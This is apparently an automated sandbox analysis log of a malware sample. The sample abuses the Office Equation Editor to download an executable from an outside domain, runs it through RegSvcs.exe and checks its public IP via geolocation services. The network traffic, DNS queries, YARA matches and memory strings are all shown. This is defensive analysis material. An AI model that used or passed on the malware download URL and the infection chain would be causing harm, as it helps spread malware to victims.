Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: NATIXISUS NATIXISUS

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org

Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035306AA URLDownloadToFileW,

2_2_035306AA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htm

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: baitalasma.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://baitalasma.com/T76434567000.exej
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.887544334.0000000000922000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A58000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002458000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002528000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EQNEDT32.EXE, 00000002.00000003.526417075.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.00000000005B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T7643
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526541779.000000000057F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526417075.000000000057F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exeate
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exeqqC:
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://baitalasma.com/T76434567000.exe~x
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.104
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/81.181.54.1044
